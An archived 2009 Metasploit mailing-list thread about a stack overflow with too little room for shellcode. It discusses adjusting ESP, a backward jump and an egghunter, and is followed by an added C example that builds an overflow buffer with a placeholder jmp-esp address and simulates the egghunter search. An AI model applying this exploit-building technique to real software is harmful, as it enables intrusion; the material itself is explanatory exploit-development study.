Metasploit mailing list archives

No room for shellcode


From: allendb760 at googlemail.com (DB Allen)
Date: Sun, 3 May 2009 19:19:44 +0100

Thanks for the help guys, much appreciated - I'll try adjusting ESP and see
if that helps any - will also give the EggHunter method a go too, not tried
that before.

Out of interest, has anyone ever seen an overflow fail when changing the shellcode? As in, the buffer overflow doesn't even occur...

I thought there may be a bad character in the shellcode, which was why it
was not landing up in the stack properly, so I generated new shellcode set to
exclude the byte I thought could be causing problems, and the overflow
didn't even occur. I was sending exactly the same data for the initial buffer,
just different shellcode... It's irritated the hell outta me!

Thanks,

DB




On Sun, May 3, 2009 at 10:59 AM, Patrick Webster <patrick at aushack.com> wrote:

Yeah try adjusting ESP first...

Otherwise you can either use the existing jmp esp return address to hit
your nops but swap the nops for a jump backwards to the start of
the 'A's (5 bytes), or use the EggHunter payload (about 32 bytes), which will
search the process space for the payload and execute it...

As a reference, I used this for the Ximati http server module due to
similar space issues.

-Patrick
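The two approaches in Patrick's message, worked through as an added example. This is not code from the thread or from the Metasploit module he mentions; the addresses (BUF_BASE, the placeholder JMP_ESP gadget), the distance to the saved return address (RET_OFF) and the sample buffers are all constructed assumptions for illustration. It encodes the 5-byte "jump backwards" that replaces the nops after a jmp esp, checks where that jump lands, and mirrors the doubled-tag check an egghunter performs as a plain in-process scan (the real ~32-byte hunter walks memory page by page with a syscall so it does not fault; that part is deliberately not reproduced).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Overflow layout assumed for this example (all addresses hypothetical):
 *   BUF_BASE                 start of the attacker-controlled buffer (payload goes here)
 *   BUF_BASE + RET_OFF       saved return address, overwritten with a "jmp esp" gadget
 *   BUF_BASE + RET_OFF + 4   what ESP points at when "jmp esp" fires: the jump back
 */
#define BUF_BASE  0x0012FF00u   /* hypothetical stack address of the buffer */
#define RET_OFF   268u          /* hypothetical distance to the saved EIP */
#define JMP_ESP   0xDEADBEEFu   /* placeholder, not a real jmp esp address */

/* Encode a jump from the instruction at `from` to `target`. Uses the 2-byte
 * short form (EB rel8) when the displacement fits, otherwise the 5-byte near
 * form (E9 rel32) Patrick refers to. Displacements are relative to the end of
 * the jump instruction itself. Returns the encoded length. */
size_t encode_jmp(uint32_t from, uint32_t target, uint8_t out[5]) {
    int32_t rel8 = (int32_t)(target - (from + 2));
    if (rel8 >= -128 && rel8 <= 127) {
        out[0] = 0xEB;
        out[1] = (uint8_t)rel8;
        return 2;
    }
    int32_t rel32 = (int32_t)(target - (from + 5));
    out[0] = 0xE9;
    for (int i = 0; i < 4; i++)                 /* rel32 is little-endian */
        out[1 + i] = (uint8_t)((uint32_t)rel32 >> (8 * i));
    return 5;
}

/* Decode where a jump located at `at` transfers control; used to verify the encoding. */
uint32_t jmp_destination(uint32_t at, const uint8_t *ins) {
    if (ins[0] == 0xEB)
        return at + 2 + (uint32_t)(int32_t)(int8_t)ins[1];
    int32_t rel32 = (int32_t)((uint32_t)ins[1] | (uint32_t)ins[2] << 8 |
                              (uint32_t)ins[3] << 16 | (uint32_t)ins[4] << 24);
    return at + 5 + (uint32_t)rel32;
}

/* Assemble the buffer: payload first, 'A' filler up to the return address,
 * the jmp esp gadget, then the jump back to BUF_BASE where the payload sits.
 * Returns the total length, or 0 if the payload or capacity does not fit. */
size_t build_buffer(const uint8_t *payload, size_t plen, uint8_t *buf, size_t cap) {
    if (plen > RET_OFF || cap < RET_OFF + 4 + 5) return 0;
    memcpy(buf, payload, plen);
    memset(buf + plen, 'A', RET_OFF - plen);
    for (int i = 0; i < 4; i++)                 /* gadget address, little-endian */
        buf[RET_OFF + i] = (uint8_t)(JMP_ESP >> (8 * i));
    return RET_OFF + 4 + encode_jmp(BUF_BASE + RET_OFF + 4, BUF_BASE, buf + RET_OFF + 4);
}

/* The EggHunter alternative: the payload is placed anywhere in the process
 * behind an 8-byte egg (a 4-byte tag written twice) and the hunter scans
 * memory for it. The tag is doubled so the hunter's own single copy of the
 * tag never matches. Returns the offset of the payload after the egg, or -1. */
long find_egg(const uint8_t *mem, size_t len, const char tag[4]) {
    uint8_t egg[8];
    memcpy(egg, tag, 4);
    memcpy(egg + 4, tag, 4);
    for (size_t i = 0; i + 8 <= len; i++)
        if (memcmp(mem + i, egg, 8) == 0)
            return (long)(i + 8);
    return -1;
}

int main(void) {
    uint8_t payload[] = { 0xCC, 0xCC, 0xCC, 0xCC };   /* stand-in for shellcode */
    uint8_t buf[512];
    size_t n = build_buffer(payload, sizeof payload, buf, sizeof buf);
    uint32_t jmp_at = BUF_BASE + RET_OFF + 4;
    printf("buffer %zu bytes; jump at %08x lands at %08x (buffer starts at %08x)\n",
           n, jmp_at, jmp_destination(jmp_at, buf + RET_OFF + 4), BUF_BASE);

    /* constructed memory image: junk, the doubled tag, then the payload */
    const uint8_t heap[] = "junk junk w00tw00t\xCC\xCC\xCC\xCC";
    printf("egg found, payload at offset %ld\n", find_egg(heap, sizeof heap - 1, "w00t"));
    return 0;
}
```

The check worth doing before sending anything is the jmp_destination round trip: with the layout above the jump sits 272 bytes past the buffer start, so the rel32 must be -277 (the 5 bytes of the jump itself count), and an off-by-one there lands you in the 'A's or before the buffer rather than on the payload. If the filler ever gets short enough that the displacement fits in a signed byte, the 2-byte form leaves three more bytes for the payload.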
